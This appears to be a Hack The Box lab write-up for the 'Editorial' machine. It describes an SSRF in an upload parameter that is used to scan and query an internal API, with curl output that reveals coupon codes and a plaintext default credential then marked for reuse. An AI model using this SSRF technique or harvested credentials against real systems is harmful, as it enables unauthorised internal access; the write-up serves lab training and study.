SSRF

SSRF has been identified and confirmed to be present in the bookurl parameter on the /upload endpoint of the target web application. It sends out a POST request to the /upload-cover endpoint with the user input data, and it doesn’t have any form of input sanitization in place, allowing access to the internal web services.

API Service

┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/fa7e7526-0cfb-4939-a8b6-48b983ed4392                                    
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 14:01:35 GMT
Content-Type: application/octet-stream
Content-Length: 911
Connection: keep-alive
Content-Disposition: inline; filename=fa7e7526-0cfb-4939-a8b6-48b983ed4392
Last-Modified: Thu, 20 Jun 2024 14:01:05 GMT
Cache-Control: no-cache
ETag: "1718892065.9960847-911-4165933148"
 
{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

While there appear to be nothing present in the port 80 internally, an API service has been discovered on the internal port 5000 while conducting a “port scanning” through the SSRF

promotions

┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/5ab31110-6bc3-4286-93f4-38171ccc903e
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 14:52:54 GMT
Content-Type: application/octet-stream
Content-Length: 207
Connection: keep-alive
Content-Disposition: inline; filename=5ab31110-6bc3-4286-93f4-38171ccc903e
Last-Modified: Thu, 20 Jun 2024 14:52:50 GMT
Cache-Control: no-cache
ETag: "1718895170.2642004-207-3865909207"
 
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

The API endpoint, /api/latest/metadata/messages/promos, does not appear to be functional

coupons

┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/0aa25044-030c-4701-bf08-2cd3106b0e59
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 14:48:53 GMT
Content-Type: application/octet-stream
Content-Length: 194
Connection: keep-alive
Content-Disposition: inline; filename=0aa25044-030c-4701-bf08-2cd3106b0e59
Last-Modified: Thu, 20 Jun 2024 14:48:48 GMT
Cache-Control: no-cache
ETag: "1718894928.3201916-194-3836024766"
 
[{"2anniversaryTWOandFOURread4":{"contact_email_2":"info@tiempoarriba.oc","valid_until":"12/02/2024"}},{"frEsh11bookS230":{"contact_email_2":"info@tiempoarriba.oc","valid_until":"31/11/2023"}}]

The API endpoint, /api/latest/metadata/messages/coupons, contains coupons These may be reuse later

new_authors

┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/12d04490-66a8-43ad-8cc7-9b32b73fe233
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 14:57:21 GMT
Content-Type: application/octet-stream
Content-Length: 506
Connection: keep-alive
Content-Disposition: inline; filename=12d04490-66a8-43ad-8cc7-9b32b73fe233
Last-Modified: Thu, 20 Jun 2024 14:57:17 GMT
Cache-Control: no-cache
ETag: "1718895437.1002104-506-3895400464"
 
{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}

The API endpoint, /api/latest/metadata/messages/author, shows a welcome message, which contains a default credential for the organization; dev:dev080217_devAPI!@ The credential must be checked for reuse

platform_use

┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/3df98e34-bbed-41f2-9511-d606c559d464               
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 15:01:25 GMT
Content-Type: application/octet-stream
Content-Length: 207
Connection: keep-alive
Content-Disposition: inline; filename=3df98e34-bbed-41f2-9511-d606c559d464
Last-Modified: Thu, 20 Jun 2024 15:01:19 GMT
Cache-Control: no-cache
ETag: "1718895679.9562194-207-4199553103"
 
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

The API endpoint, /api/latest/metadata/messages/how_to_use_platform, isn’t functional

version

┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/cdb73ced-d624-4f72-9577-e70dbf10a575
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 15:02:35 GMT
Content-Type: application/octet-stream
Content-Length: 618
Connection: keep-alive
Content-Disposition: inline; filename=cdb73ced-d624-4f72-9577-e70dbf10a575
Last-Modified: Thu, 20 Jun 2024 15:02:31 GMT
Cache-Control: no-cache
ETag: "1718895751.5042222-618-18487468"
 
[{"1":{"api_route":"/api/v1/metadata/","contact_email_1":"soporte@tiempoarriba.oc","contact_email_2":"info@tiempoarriba.oc","editorial":"Editorial El Tiempo Por Arriba"}},{"1.1":{"api_route":"/api/v1.1/metadata/","contact_email_1":"soporte@tiempoarriba.oc","contact_email_2":"info@tiempoarriba.oc","editorial":"Ed Tiempo Arriba"}},{"1.2":{"contact_email_1":"soporte@tiempoarriba.oc","contact_email_2":"info@tiempoarriba.oc","editorial":"Editorial Tiempo Arriba","endpoint":"/api/v1.2/metadata/"}},{"2":{"contact_email":"info@tiempoarriba.moc.oc","editorial":"Editorial Tiempo Arriba","endpoint":"/api/v2/metadata/"}}]

The API endpoint, /api/latest/metadata/changelog, reveals version information There appears to be another version of API service is present; /api/v2

After several testing, It’s concluded that none of them are available

latest

┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ curl -i http://editorial.htb/static/uploads/4557cd33-9eec-4ec8-a946-dbb7c561d0e2
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 20 Jun 2024 15:04:21 GMT
Content-Type: application/octet-stream
Content-Length: 207
Connection: keep-alive
Content-Disposition: inline; filename=4557cd33-9eec-4ec8-a946-dbb7c561d0e2
Last-Modified: Thu, 20 Jun 2024 15:04:18 GMT
Cache-Control: no-cache
ETag: "1718895858.400226-207-4197325020"
 
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

The /api/latest/metadata API endpoint is not functional

InfoSec LAB

Explorer

Editorial_SSRF